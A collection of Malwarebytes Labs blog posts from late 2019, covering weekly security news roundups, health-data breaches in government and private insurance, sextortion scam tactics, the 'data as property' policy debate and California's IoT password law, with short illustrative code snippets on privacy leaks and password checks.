Techie Feeds

A week in security (November 25 – December 1)

Malwarebytes - Mon, 12/02/2019 - 16:23

Last week on Malwarebytes Labs, we discussed why the notion of “data as property” may potentially hurt more than help, homed in on sextortion scammers getting more creative, and explored the possible security risks Americans might face if the US changed to universal healthcare coverage.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (November 25 – December 1) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Would ‘Medicare for All’ help secure health data?

Malwarebytes - Tue, 11/26/2019 - 20:30

DISCLAIMER: This post is not partisan, but rather focuses on risk assessment based on history and the threats we may face in the future. We do not endorse any style of healthcare plan; we examine only its data security risk.

For many folks, the term ‘Healthcare for All’ brings up an array of emotions ranging from concern to happiness, and given the sweeping changes that would come with such a policy, we’re not surprised. However, beyond the usual arguments on this subject, we wanted to ask: Are there any security risks we need to worry about if the United States were to switch to ‘Healthcare for All’ policies?

To clarify, there are many healthcare-for-all style plans currently on paper, being fine-tuned in Washington and in the minds of politicians. So, for the purposes of this article, we’re referring to ‘Healthcare for All’ plans that are meant to replace, not supplement, private insurance plans, in addition to legislation that prohibits private insurance companies from collecting and/or storing patient data.

‘Healthcare for All’ data security

To start, we’re going to examine the government’s track record of securing patient data. Since we aren’t living in a world where ‘Healthcare for All’ exists in our country, we’ll use the data security practices concerning HealthCare.gov and the department that runs it, the Centers for Medicare and Medicaid Services (CMS), to get a sense of how well patient data might be secured by government departments.

HealthCare.gov had a bumpy start back in October of 2013. Numerous issues resulted in only a small percentage of patients being able to sign up through the website in its first week.

In an article posted by the Associated Press, as well as independent investigations by the Electronic Frontier Foundation (EFF), it was discovered that HealthCare.gov was sending personal data to third parties by putting personal information in data request headers.

Request header sent to third-party advertisers, including personal information.
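The mechanism EFF described can be illustrated with a minimal sketch (the domains and form fields below are hypothetical): when a page URL carries personal details in its query string, the browser sends that full URL in the Referer header of requests for any third-party content embedded on the page.

```python
# Sketch of the leak EFF described: PII placed in a page URL's query string
# travels to third parties via the Referer header. Domains and field names
# here are hypothetical.
from urllib.parse import urlencode, urlparse, parse_qs

# An enrollment page that encodes personal details in its URL
params = {"age": "52", "zip": "85001", "smoker": "1", "income": "30000"}
page_url = "https://enroll.example.gov/plans?" + urlencode(params)

# The request a browser makes for an ad pixel embedded on that page;
# browsers typically attach the full page URL as the Referer
third_party_request = {
    "GET": "https://ads.example-tracker.com/pixel.gif",
    "Referer": page_url,
}

# The third party can now recover the personal details from the header
leaked = parse_qs(urlparse(third_party_request["Referer"]).query)
print(leaked["zip"])  # ['85001']
```

The common mitigations are keeping PII out of URLs entirely or setting a restrictive Referrer-Policy so the query string never leaves the first-party site.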

Later, in September 2015, the Department of Health and Human Services (HHS) inspector general completed a federal audit of CMS and the website. Their primary concern was not that patient information had already been compromised, but rather the potential breach of a database called MIDAS, which stored a great deal of personally identifiable information about users of HealthCare.gov. Namely, the database had numerous high-severity vulnerabilities that needed to be patched, and overall, health officials didn’t utilize best practices across the entire system.

Finally, in 2018, the U.S. Government Accountability Office conducted a survey of the Centers for Medicare and Medicaid Services to assess its ability to protect Medicare data from external entities.

According to HIPAAJournal.com:

“The study had three main objectives: To determine the major external entities that collect, store, and share Medicare beneficiary data, to determine whether the requirements for protection of Medicare data align with federal guidance, and to assess CMS oversight of the implementation of those requirements.”

It turns out that while there are requirements in place to ensure that certain entities are cleared for access to this data, some entities are not covered by them and could therefore abuse the data they gain access to! Three main groups access Medicare beneficiary data: Medicare Administrative Contractors (MACs), who process Medicare claims; research organizations; and entities that use claims data to assess the performance of Medicare service providers.

Unfortunately, only the processes for clearing access for MACs and service provider entities are in line with federal guidance, which is designed to apply to all CMS contractors. Researchers, on the other hand, aren’t considered CMS contractors. In other words, the oversight required by federal regulation was applied to only two-thirds of the users who could access that data, so there is no guarantee that the data was fully protected.

While we listed numerous instances of government-controlled patient data being put into compromising positions, reports of medical data actually lost from government-controlled systems are very small. We couldn’t find anything that blamed CMS or HHS for a data breach.

Private insurance data security

That run of luck, with little if any medical data breached despite the numerous unpatched vulnerabilities identified in HealthCare.gov and its controlling department, doesn’t quite extend to the private insurance world.

In July 2019, Premera Blue Cross, an insurance company serving the Pacific Northwest of the U.S., agreed to pay a settlement of over $10 million to numerous state offices. Premera suffered a massive data breach that exposed the data of more than 10 million patients in 2015. The press release from the Washington State Office of the Attorney General claims:

“From May 5, 2014 until March 6, 2015, a hacker had unauthorized access to the Premera network containing sensitive personal information, including private health information, Social Security numbers, bank account information, names, addresses, phone numbers, dates of birth, member identification numbers and email addresses.”

In addition, there were complaints that Premera misled consumers about the breach and the full scope of potential damage that could be done.

In October of 2018, an employee of Blue Cross Blue Shield of Michigan lost a laptop that had customers’ personal medical data saved on it. The company jumped into action and worked with a subsidiary to change the access credentials to the encrypted laptop, and to its knowledge, there is no evidence that the patient data was compromised. However, according to CISOMag:

“The access information includes the member’s first name, last name, address, date of birth, enrollee identification number, gender, medication, diagnosis, and provider information. Blue Cross clarified that the Social Security numbers and financial account information were not included in the accessible data.”

Finally, in 2019, Dominion National insurance identified that an unauthorized party may have been able to access internal servers as early as August 2010! According to a press release:

“Dominion National has undertaken a comprehensive review of the data stored or potentially accessible from those computer servers and has determined that the data may include enrollment and demographic information for current and former members of Dominion National and Avalon vision, as well as individuals affiliated with the organizations Dominion National administers dental and vision benefits for. The servers may have also contained personal information pertaining to plan producers and participating healthcare providers. The information varied by individual, but may include names in combination with addresses, email addresses, dates of birth, Social Security numbers, taxpayer identification numbers, bank account and routing numbers, member ID numbers, group numbers, and subscriber numbers.“

These were three examples of breaches that occurred at actual health insurance companies, not third parties or government-controlled healthcare organizations. In two of these instances, the attacker maintained a foothold on the network for over a year (nine years in Dominion’s case!), and in another, someone simply lost a laptop full of patient data (the same thing happened to the Department of Homeland Security and the Department of Health and Human Services over the last few years; we need to just tape our laptops to our bodies like a tourist with a passport!)

Why neither of these is the problem

Okay, so which is it? Is it more secure to entrust our government with control of patient data, or are we in better hands with private insurance companies?  The reality is, neither one matters because neither is the actual problem.

It’s not the organizations that we depend on to protect our data that are being breached as much as the third-party organizations they work with.  From mailing services to labs to billing organizations, most of our patient data breaches are happening to organizations who don’t have any real need to hold on to our data, which may be why they fail to secure it. 

Third-party breaches

In September of this year, Detroit-based medical contractor Wolverine Solutions Group (WSG) was breached, possibly compromising the data of hundreds of thousands of patients nationwide. WSG provided mailing and other services to hospitals and healthcare companies. It was hit by a ransomware attack, which resulted in data belonging to the patients of numerous healthcare organizations being ransomed.

While the investigation into the attack hasn’t turned up any evidence that data was stolen, WSG President Darryl English told the Detroit Free Press:

“Nevertheless, given the nature of the affected files, some of which contained individual patient information (names, addresses, dates of birth, Social Security numbers, insurance contract information and numbers, phone numbers, and medical information, including some highly sensitive medical information), out of an abundance of caution, we mailed letters to all impacted individuals recommending that they take immediate steps to protect themselves from any potential misuse of their information,”

Despite their belief that no patient data was obtained, the same article by the Detroit Free Press describes the case of Tyler Mayes of Oxford, who has identified numerous fraudulent medical charges on his credit report:

“I haven’t been put under the knife in four years,” he said. “So I had a phantom surgery that not even I knew about? I have received no bills in the mail, and have received no phone calls. I have no emails. They just randomly appeared on my credit report.”

“I think they’re not letting out as much out of the bag as they’ve got in there,” Mayes said of the Wolverine Solutions Group breach.

In May, Spectrum Health Lakeland started sending letters to about a thousand of its patients because its billing services company, OS, Inc., was breached, resulting in the possible theft of patient names, addresses, and health insurance providers, but not Social Security and driver’s license numbers (the bad guys will have to find those somewhere else, I guess).

According to an article for MLive Michigan that covers the breach:

“Billing services company OS, Inc. confirmed Wednesday, May 8, an unauthorized individual accessed an employee’s email account that held information related to some Spectrum Health Lakeland patients, according to a Spectrum Health news release.”

A successful phishing attack against the employees of Solara Medical Supplies, reported in mid-November, led to a breach that lasted almost a year and resulted in the loss of names and, potentially, addresses, dates of birth, health insurance information, Social Security numbers, financial and identification information, passwords, PINs, and all kinds of other juicy data.

However, a big concern about the breach of employee e-mail accounts for a third-party vendor is the possibility for attackers to use those infected systems as staging areas to launch additional malicious phishing attacks using e-mail addresses from employees of Solara.

Finally, an ongoing investigation by the Securities and Exchange Commission that started in May 2019 identified that American Medical Collection Agency (AMCA) was breached for eight months, between August 2018 and March 2019.

Actual numbers of affected patients are still being worked out, however according to Health IT Security, at least six covered entities have reported that their patient data was compromised by the attack. This includes patient information from 12 million folks who have utilized Quest Diagnostics and 7.7 million Labcorp patients.

“And just this week a sixth provider, Austin Pathology Associates, reported at least 46,500 of its patients were impacted by the event. Shortly after, seven more covered entities reported they too were impacted: Natera, American Esoteric Laboratories, CBLPath, South Texas Dermatopathology, Seacoast Pathology, Arizona Dermatopathology, and Laboratory of Dermatopathology ADX.”

When the tallies of known affected patients are added together, approximately 25 million patients have had their data compromised by this attack. Some providers are still figuring out the full extent, so you can rest assured the number is likely to rise.

So, coming back to our original question, it looks like our biggest problem with keeping control of medical data is that it’s spread out all over the place! A ‘Medicare for All’ plan might reduce breaches to some extent, because it would remove a few companies that could possess the data. However, just based on our own research for this article, we often see cybercriminals succeed by breaching third-party medical vendors rather than going after government or established insurance companies.

What is being done?

If this is your first time hearing about the potential dangers of third-party data sharing, don’t fret, because politicians are on it! A first step in taking action to curb data theft is to establish a department specifically for digital privacy—an idea introduced this month by Rep. Anna G. Eshoo [D-CA-18]. The Online Privacy Act of 2019 was introduced to the U.S. House of Representatives in early November.

The purpose of the bill is:

”To provide for individual rights relating to privacy of personal information, to establish privacy and security requirements for covered entities relating to personal information, and to establish an agency to be known as the United States Digital Privacy Agency to enforce such rights and requirements, and for other purposes.”

Online Privacy Act of 2019

There are some politicians who are against this bill and want the Federal Trade Commission to remain the agency responsible for digital privacy; however, we can see how well that is going.

Beyond a new department for privacy, Senator Mark R. Warner [D-VA] has called for new legislation on patient data sharing to include more language about the importance of establishing controls and security in the development of technologies that give patients greater insight into their Electronic Health Records (EHRs). You can read about that legislation, the ACCESS Act, on our blog as well.

The proposed legislation from the Department of Health and Human Services (HHS) requires insurers participating in CMS-run programs, like Medicare, to allow patients to access their health information electronically. They plan to do this by establishing an Application Programming Interface (API) that third-party vendors can utilize to obtain data and make it viewable to the patient.
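As a rough sketch of what such an API call could look like, here is a hypothetical third-party request in the style of HL7 FHIR, a standard widely used for patient-data APIs (the post doesn’t name the standard CMS would mandate, and the endpoint, token, and patient ID below are invented for illustration):

```python
# Hypothetical sketch of a third-party app calling an insurer's patient-data
# API, in the style of HL7 FHIR. The base URL, token, and patient ID are
# invented; a real app would obtain the token via patient-approved OAuth 2.0.
from urllib.request import Request

FHIR_BASE = "https://api.example-insurer.com/fhir/r4"  # hypothetical endpoint
ACCESS_TOKEN = "example-oauth2-token"  # hypothetical patient-granted token

def build_patient_request(patient_id):
    """Build an authorized HTTP request for one FHIR Patient resource."""
    return Request(
        f"{FHIR_BASE}/Patient/{patient_id}",
        headers={
            "Authorization": f"Bearer {ACCESS_TOKEN}",
            "Accept": "application/fhir+json",  # FHIR's JSON media type
        },
    )

req = build_patient_request("12345")
print(req.full_url)  # https://api.example-insurer.com/fhir/r4/Patient/12345
```

Every such endpoint and token is also an attack surface, which is why the security of the API itself matters as much as the data format it serves.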

Sen. Warner, who has been a huge advocate for privacy and security, wrote a letter to the legislation authors, asking for a serious focus on the security of that API so it’s not abused. In the letter he states:

“…I urge CMS to take additional steps to address the potential for misuse of these features in developing the rules around APIs. In just the last three years, technology providers and policymakers have been unable to anticipate – or preemptively address – the misuse of consumer technology which has had a profound impact across our society and economy. As I have stated repeatedly, third-party data stewardship is a critical component of information security…”

Senator Mark R. Warner [D-VA]

We don’t know how much these efforts will help in the long run, but we are in a good position to start seriously discussing the dangers of, and solutions to, problems concerning digital healthcare data, specifically its use and abuse.

The wrap-up

Now that we’ve covered all that, did we answer our question? Does ‘Medicare for All’ have any impact on data security? It looks like the answer is no: regardless of the health plan we use, the data is going to remain vulnerable, in large part because of third-party sharing.

Neither the government nor private health insurers have a perfect score when it comes to data security, but both have been affected by third-party breaches. In the case of private insurance companies, breaches like the one at OS, Inc. circumvented all efforts made by Blue Cross and other insurers to protect their patient data. At the same time, government healthcare technology has been riddled with misconfigurations and poor practices that frankly make it a miracle the data hasn’t already been completely harvested by cybercriminals.

The good news is that every attack brings the knowledge of how to avoid one in the future. Our health data is more secure now than at any other point in the history of digital healthcare records, and it’s only going to get better! With government legislation backing the protection of not just medical data, but how it’s transferred and stored, we can turn this whole thing around.

Unfortunately, the millions of patients whose personal data has been stolen, and likely stored away in the databases of numerous criminals, will probably have to deal with fraud and theft for the foreseeable future. They are the broken eggs in this security omelet. Let’s hope the next group fares better.

The post Would ‘Medicare for All’ help secure health data? appeared first on Malwarebytes Labs.


Sextortion scammers getting creative

Malwarebytes - Tue, 11/26/2019 - 17:09

We’ve covered sextortion before, focusing in on how the core of the threat is an exercise in trust. The threat actor behind the campaign will use whatever information is available on the target to convince them that the threat actor does indeed have incriminating information on them. (They don’t.) But as public awareness of the scam grows, threat actors have to pivot to less expected pitches to maintain the same response from victims. Let’s take a look at a recent variant.

As we can see, the technique at hand appears to be peppering the pitch with as many technical terms as possible in order to wear down a victim’s defenses and sell the lie that the threat actor actually hacked them. (NOTE: employing a blizzard of technical vocabulary as quickly as possible is a common technique to sell lies offline, as well as via email.) If we take a closer look, the facade begins to fall away fairly quickly.

  • EternalBlue, RATs, and trojans are all different things
  • Porn sites either don’t allow anonymous user uploads, or scan and monitor those uploads for malicious content
  • The social media data referenced is not stored locally and thus cannot be ‘harvested’ and is largely available on the open web anyway
  • A RAT cannot take a specific action based on what you’re doing in front of an activated camera. How would it know?

Some of these points would be difficult for an average user to realize, but the last two serve as pretty good red flags that the actor in the email is not as sophisticated as he claims. The problem is that by starting the pitch with the most alarming possible outcome, many users are pushed into a panic and don’t stop to consider small details. A key to good defense against sextortion is taking a deep breath, reading the email carefully, and asking yourself – do these claims make sense?

Where did it come from?

Sextortion scammers typically take a shotgun approach to targeting, using compromised or disposable email addresses to send out as many messages as possible. Some variants will attempt to make the pitch more effective by including actual user passwords gleaned from old database breaches. The important thing to remember though, is that the scammers do not have any current information to disclose, because they didn’t actually hack anyone. This is a fairly low effort social engineering attack that remains profitable precisely because the attacker does not have to expend resources actually hacking an end user.
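Those recycled passwords are checkable: the Have I Been Pwned “Pwned Passwords” range API uses a k-anonymity scheme, so you can find out whether a password appears in old breach corpora without ever transmitting the password itself. A minimal sketch of the client-side half:

```python
# Check a password against breach corpora the way the Have I Been Pwned
# range API expects: hash locally, send only the first 5 hex characters of
# the SHA-1 digest, and match the returned suffixes on your own machine.
import hashlib

def hibp_range_parts(password):
    """Return the (prefix, suffix) split of the password's SHA-1 hash."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]

prefix, suffix = hibp_range_parts("password")
print(prefix)  # 5BAA6

# A real client would then fetch:
#   GET https://api.pwnedpasswords.com/range/5BAA6
# and look for `suffix` in the response body; a match means the password has
# appeared in a known breach, and the sextortion email merely recycled it.
```

Finding your password in that list doesn’t mean you were hacked by the scammer; it means an old service you used was breached, and the password should be retired everywhere.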

How NOT to get help

The bulk of cyber threats out there are in fact symptoms of human systems failures. Appropriate, responsible infosec responses to these failures give people tools to shore up those systems, thereby ensuring the cyber threat cannot gain a foothold to begin with. Less prudent infosec responses, however, do this:

An IP address is the rough online equivalent of a zip code. Could you find where someone whose name you don’t know lives based solely on a zip code? Would you really trust a company that makes grammatical errors in its own Google ads?

Is there anyone in 2019 who genuinely believes it’s possible to keep anything off the Internet? Extraordinary claims require extraordinary evidence, but unfortunately they don’t provide any as their technology is “proprietary.”

It can be very frightening for a user to receive one of these social engineering attempts, particularly if the pitch is loaded with a slew of technical terms they do not understand. But close reading of the email can sometimes reveal red flags indicating the threat actor is not exactly the sharpest hacker out there. Further, the defense against sextortion is one of the cheapest, easiest defenses against cyber threats out there: do nothing. Stay vigilant, and stay safe.

The post Sextortion scammers getting creative appeared first on Malwarebytes Labs.


‘Data as property’ promises fix for privacy problems, but could deepen inequality

Malwarebytes - Mon, 11/25/2019 - 16:00

In mid-November, Democratic presidential hopeful Andrew Yang unveiled a four-prong policy approach to solving some of today’s thornier tech issues, such as widespread misinformation, technology dependence, and data privacy. Americans, Yang proposed, should receive certain, guaranteed protections for how their data is collected, shared, and sold—and if they choose to waive those rights, they should be compensated for it.

This is, as Yang calls it, “data as a property right.” It is the idea that, since technology companies are making billions of dollars off of what the American public feeds them—data in the forms of “likes,” webpage visits, purchase records, location history, friend connections, etc.—the American public should get a cut of that money, too.

Data property supporters in the US argue that, through data payments, Americans could rebalance the relationship they have with the technology industry, giving them more control over their data privacy and putting some extra money in their pockets, should they want it.

But data privacy advocates argue that, if what Americans need are better data privacy rights, then they should get those in an actual data privacy bill. Further, the data property model could harm more people than it helps, disproportionately robbing low-income communities of their data privacy, while also normalizing the idea that privacy is a mere commodity—it’s only worth the sale price we give it.

To some, a data property model would only keep large corporations in control. No sudden wellspring of rights. No rebalance of power.  

Ulises Mejias, associate professor at State University of New York, Oswego, described the data property model in a broader historical context.

“Paying someone for their work is not a magical recipe for eliminating inequality, as two centuries of capitalism have demonstrated,” Mejias said. He said that, like plantation owners and factory owners, modern data-mining companies understand that, to maintain their profit streams, they have to allow some leniency towards those who they profit from—the people.

“So, we will probably start to see more proposals to ‘fix’ the system by paying us for our data, even from ‘progressive’ figures like Yang or [Jaron] Lanier,” Mejias said. “This, however, does not amount to the dismantling of data colonialism. Rather, it is an attempt to make it the new normal.”

He continued: “The surveillance mechanisms would not go away; they would just be paying us to put up with them.”

Data as property

In 2013, the computer scientist Jaron Lanier, who Mejias referenced, published the book Who Owns the Future?, a forward-looking, philosophical analysis of our relationship with data and the Internet. In the book, Lanier proposed a then-novel idea: People should be paid royalties for the data they create that goes on to benefit other people.

Six years later, Lanier has refined his ideas into the banner of “data dignity.” As he loftily told the New York Times in a video segment, a recording of “Für Elise” buoying his words:

“You should have the moral rights to every bit of data that exists because you exist, now and forever.”

For data property or dignity supporters, owning your data is a first step toward meaningful, tectonic changes: individualized data privacy controls, higher economic returns, and balanced relationships with technology corporations.

Here’s what that society would allow, supporters say.

One, if consumers own their data, they can make decisions about how companies treat it, including how their data is collected and then shared and sold to separate, third parties. By having the option to say “no” to data sharing and selling, consumers could, in effect, say “no” to some of the most common data privacy oversteps today. No more menstrual tracking information shared with Facebook. No more GPS location data aggregated publicly online. Maybe even no more Cambridge Analytica.

Two, the option to sell data could potentially benefit countless Americans with a near-endless revenue stream. Christopher Tonetti, associate professor of economics at Stanford University’s Graduate School of Business, argued in the Wall Street Journal that data is unlike most any other commodity because its value continues after the first point of sale.

“With most goods—think of a plate of sushi or an hour of your doctor’s time—one person’s consumption of the good means there is less to go around. But data is infinitely usable,” Tonetti said. “That means that if consumers could sell their data, they would have the ability to share the data from any transaction with multiple organizations—to their own benefit and that of society as a whole.”

This potential passive, money-making venture gains even more appeal when major political players—like Yang—argue that “our data is now worth more than oil.”

But there’s missing information in that statement, say data privacy advocates. Our data is worth more than oil to whom?

Data as property flaws

Curiously absent from the discussions about data property rights are detailed analyses about the actual value of consumer data. Sure, the numbers may show that the data-driven advertising industry has eclipsed the dollar-size of the oil industry, but there is no data analogue for what an oil barrel costs. There’s no going rate for Facebook likes, no agreed-upon exchange rate for Instagram popularity.

Hayley Tsukayama, legislative analyst at the Electronic Frontier Foundation, said that the available numbers do not provide reliable statistics when trying to determine data’s “value.”

“When you look at a sell list of location data, and do some back-of-the-envelope math, where a company paid this much for it, and there’s 50 people on the list, and therefore, their data is worth this—that’s not how it works,” Tsukayama said. She said we similarly cannot track the value of the average Facebook user’s data based on a simplistic equation of dividing the company’s ad revenue by its user base.
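For illustration, the kind of back-of-the-envelope division Tsukayama warns against looks like this (the inputs are rough, illustrative 2018-era figures for a large social network, not audited numbers):

```python
# The naive per-user "data value" calculation: divide ad revenue by user
# count. The inputs are rough illustrative figures, not audited numbers.
annual_ad_revenue = 55_000_000_000    # ~$55B in yearly ad revenue
monthly_active_users = 2_300_000_000  # ~2.3B users

naive_value_per_user = annual_ad_revenue / monthly_active_users
print(f"${naive_value_per_user:.2f} per user per year")  # $23.91 per user per year

# The flaw Tsukayama identifies: this is revenue earned by selling ads
# around the data, not a market price anyone would pay an individual for it.
```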

Tsukayama also pointed to a bigger problem with the data as property model: Consumers will not be selling their data, so much as they’ll be selling their privacy. And for some types of data, the invasion of privacy will always cost too much, she said.

“My location data may cost a penny to buy, but to me that’s worth no amount of money—there’s no amount of money you could pay me to make me okay with someone knowing my location,” she said.

Chad Marlow, senior advocacy and policy counsel at ACLU, added another problem about data valuation: It’s subjective. A company that sells Legos, he said, would pay more for children’s data, much in the same way that a company that sells cars would pay more for adults’ data.

Taking the example to what he called an extreme, Marlow said:

“My tax returns? Probably not worth so much. Trump’s tax returns? Probably worth a big deal!”

In all these situations—whether it’s vague data valuation, contextual pricing, or putting a literal price tag on privacy—both Tsukayama and Marlow agreed that some consumers will be harmed more than others.

Much like the pay-for-privacy schemes that have bubbled up in the past year, data property models would enable companies to take advantage of low-income communities that need the extra money. It’s much easier for a middle-class earner to say no to a privacy invasion than it is for stressed, hungry families, Marlow said.

“If you have parents who are struggling to put food on the table—who are eating bread and drinking water for multiple dinners—and you say ‘I will give you money if you sell your data’ and you don’t even say how much, they will say yes immediately,” Marlow said. “Because they cannot afford to say no.”

Finally, the actual money going into consumers’ pockets from a data property model might be a “pittance,” Tsukayama said. She added that, for the consumers who take the money, it isn’t worth the cost to their privacy.

“It’s a particularly pernicious form of privacy nihilism, where someone would say ‘Fine, do what you want, just throw me a little bit back,’” Tsukayama said, imagining a bargain in which consumers are fine with privacy invasions so long as they get a little bit of money.

So, if low-income communities are disproportionately harmed, and if consumers receive pennies, and if the sale of privacy becomes normalized for those pennies, who wins in this model?

According to Marlow, the “data agents”—organizations or companies that will facilitate the sale of consumers’ data to one company and then another company and then another. For every single step of those transactions, Marlow said, each data agent will get a cut of the sale, with consumers further down the line to get their share.

“If you get a cent and they get a nickel, and they do this hundreds of thousands of times, there’s real money to be made for them,” Marlow said.
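Marlow’s arithmetic is worth spelling out; using his hypothetical cent-and-nickel split over a hundred thousand transactions (the low end of his “hundreds of thousands”):

```python
# Marlow's hypothetical split: the data agent's nickel per transaction
# out-earns the consumer's cent five to one, and volume does the rest.
consumer_cut = 0.01     # one cent per transaction to the data subject
agent_cut = 0.05        # one nickel per transaction to the data agent
transactions = 100_000  # "hundreds of thousands of times", lower bound

print(f"consumer: ${consumer_cut * transactions:,.2f}")  # consumer: $1,000.00
print(f"agent:    ${agent_cut * transactions:,.2f}")     # agent:    $5,000.00
```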

He said there are already examples of these types of companies. He said he pushed back against one earlier this year, when a data property bill landed in Oregon.

Data as property legislation

In the past year, the idea to treat data as property has escaped the niche audiences served by papers like the Wall Street Journal and the Harvard Business Review.

It’s now inspired lawmakers across the US.

For US Senators Mark Warner and Josh Hawley, who together introduced the DASHBOARD Act, giving consumers better transparency into the value of their data would better enable consumers to make informed decisions about what tech platforms to use. For Representative Doug Collins of Georgia, who proposed a bill to protect online privacy, giving the American people the right to own their data is a cornerstone to navigating the future economy.

But the clearest legislative push for data property rights landed in Oregon earlier this year in Senate Bill 703. Introduced by one state senator and two representatives, the bill was strongly supported by a company called Hu-manity.co, a seemingly small shop with the big idea that legal ownership of data as property should be the next universal human right.

In 2018, the company announced a way to try to provide consumers with that right: its own app, dubbed #My31 (there are currently 30 agreed-upon universal human rights per the United Nations). The app, which focuses strictly on medical data, gives consumers an option to declare how they would like that data to be used, including leasing, sharing, donating, or getting paid for it.

#My31, then, aligned perfectly with SB 703: a bill to allow Oregonians to sell their medical data for money. The company was far from alone in supporting the bill; many similar companies submitted written testimony for lawmakers to consider. SB 703, the companies said, was a strong step toward protecting consumers’ rights to own and share their medical records as they see fit, potentially enabling them to better develop a comprehensive profile, no matter which hospitals or providers they’d used in the past. Further, some companies said, the ownership of medical data would also allow users to more easily donate that data to medical research.

Marlow saw the bill differently.

“Beware the tech industry’s latest privacy Trojan Horse,” he wrote in March.

“[The company] argues that, insofar as patient data is already being sold, its legislation is merely designed to give consumers ‘ownership’ of their data and a cut of the profits,” Marlow said. “But savvy bill readers will note that the proposed laws contain no defined percentage of the profits patients are entitled to, so they could receive mere pennies of [its] revenue in return for giving up their privacy.”

Health Wizz, a company that also lets users control their medical data, wrote in its testimony: “We don’t need more privacy legislation,” but instead, better transparency.

Introduced in January, SB 703 is currently before the state Senate’s Joint Committee on Ways and Means.

Winners and losers

Depending on who you ask, the ability for consumers to own their data will produce one of two winners—consumers or corporations.

According to Mejias, the associate professor at SUNY Oswego, there is no reason to expect the data property model to solve our current privacy problems; it will only deepen them:

“The promise of a few more bucks at a time when social support systems are disappearing and inequality is rising would simply re-create an unequal system where those with more means can afford privacy and freedom, and those with less means are subjected to more intrusion, surveillance and quantification, which ultimately perpetuates their position.”

The post ‘Data as property’ promises fix for privacy problems, but could deepen inequality appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (November 18 – 24)

Malwarebytes - Mon, 11/25/2019 - 12:55

Last week on Malwarebytes Labs, we looked at stalkerware’s legal enforcement problem, announced our cooperation with other security vendors and advocacy groups to launch the Coalition Against Stalkerware, published our fall 2019 review of exploit kits, looked at how deepfakes on LinkedIn make for malign interference campaigns, rounded up our knowledge about the Disney+ security and service issues, explained juice jacking, analyzed how a web skimmer phishes credit card data via a rogue payment service platform, and lastly, we looked at upcoming IoT bills and guidelines.

Other cybersecurity news
  • Ransomware attacks on US city and state governments have become increasingly common in recent times, and Louisiana has been targeted yet again. (Source: TechSpot)
  • National Veterinary Associates was hit by a ransomware attack late last month that affected more than half of its properties. (Source: KrebsOnSecurity)
  • After a deadline was missed for receiving a ransom payment, the group behind Maze Ransomware has published data and files stolen from security staffing firm Allied Universal. (Source: BleepingComputer)
  • A WhatsApp flaw could have let hackers steal users’ chat messages, pictures, and private information via a downloaded video file containing malicious code. (Source: The Daily Mail UK)
  • A malicious campaign is active that spoofs an urgent update email from Microsoft to infect users’ systems with the Cyborg ransomware. (Source: TechRadar)
  • Microsoft has invested $1 billion in the Elon Musk-founded artificial intelligence venture that plans to mimic the human brain using computers. (Source: Independent UK)
  • A unique data leak contains the personal and social information of 1.2 billion people and appears to originate from two different data enrichment companies. (Source: DataViper)
  • The US branch of the telecommunications giant T-Mobile disclosed a security breach that, according to the company, impacted a small number of customers of its prepaid service. (Source: SecurityAffairs)
  • A hacker has published more than 2TB of data from the Cayman National Bank. This includes more than 640,000 emails and the data of more than 1400 customers. (Source: HeadLeaks)
  • A ransomware outbreak has besieged a Wisconsin-based IT company that provides cloud data hosting, security, and access management to more than 100 nursing homes across the United States. (Source: KrebsOnSecurity)

Stay safe, everyone!

The post A week in security (November 18 – 24) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

IoT bills and guidelines: a global response

Malwarebytes - Fri, 11/22/2019 - 16:27

You may not have noticed, but Internet of Things (IoT) rules and regulations are coming whether manufacturers want them or not. From experience, drafting up laws which are (hopefully) sensible and have some relevance to problems raised by current technology is a time-consuming, frustrating process.

However, it’s not that long since we saw IoT devices go mainstream—right into people’s homes, controlling real-world aspects of their day-to-day lives, and also causing mishaps and serious issues for people dealing with them.

The theoretical IoT wild west may be drawing to a close, so we’re taking a look at some IoT related bills and guidelines currently in the news.

Where did this all begin?

You’ve probably seen articles in the last few days talking about multiple upcoming changes and suggestions for IoT vendors, but in actual fact the first steps were taken last year when California decided the time was ripe for a little bit of IoT regulation.

If you sell or offer IoT devices in California (and any Internet-connected device counts), each device must be equipped with “reasonable security features.”

Bills, bills, bills

Here’s the text of the California bill.

The key parts are these:

“Connected device” means any device, or other physical object that is capable of connecting to the Internet, directly or indirectly, and that is assigned an Internet Protocol address or Bluetooth address.

A connected device is as wide ranging as you’d expect, so that’s a good thing considering anything from your printer to your refrigerator could be communicating with the big wide world outside.

That’s great—but what, exactly, is a reasonable security feature?

Next up:

(b) Subject to all of the requirements of subdivision (a), if a connected device is equipped with a means for authentication outside a local area network, it shall be deemed a reasonable security feature under subdivision (a) if either of the following requirements are met:

(1) The preprogrammed password is unique to each device manufactured.

(2) The device contains a security feature that requires a user to generate a new means of authentication before access is granted to the device for the first time.

We’re essentially in password town. If the shipped password is unique and not something you can plug a serial number into Google to discover, or the device owner is forced to create a unique password the first time they fire it up, that would count as “reasonable security.”
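The bill's two alternatives can be sketched as a simple compliance check. This is purely illustrative: the field names and data shapes below are invented for the example, not taken from the bill's text.

```python
def has_reasonable_security(device, fleet_passwords):
    """Evaluate a device against the bill's two alternatives:
    (1) a preprogrammed password unique to each manufactured device, or
    (2) the user must generate new credentials before first access.
    `device` is a dict and `fleet_passwords` is a list of every shipped
    default password -- both hypothetical stand-ins for illustration."""
    if device.get("forces_new_password_on_first_use"):
        return True                           # alternative (2)
    pw = device.get("default_password")
    if not pw:
        return False                          # no authentication at all
    return fleet_passwords.count(pw) == 1     # alternative (1): unique default
```

A device shipping with `admin` as a fleet-wide default fails; one that forces a password change on first boot passes, no matter what it shipped with.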

One small step for IoT

Is that enough, though? Some US-based legal eagles suggest it isn’t, and they may well have a point. If IoT legislation doesn’t end up considering things like secure communication, tampering, updates, or even what happens when a device is no longer supported, then this could become messy quickly.

Even so, cheap devices with zero password functionality built in are commonplace and an absolute curse where trying to secure networks and keep users safe are concerned.

The California bill applies to any device sold in California; it doesn’t matter where they’re made. If your password name isn’t down, you’re not getting in—for want of a better and considerably less mangled expression.

This is due to roll into action on the first of January 2020, not only in California but also Oregon. It seems the US is taking the potential for IoT chaos seriously and I’d be amazed if this doesn’t end up going live in additional states in the near future.

Tackling the IoT problem globally

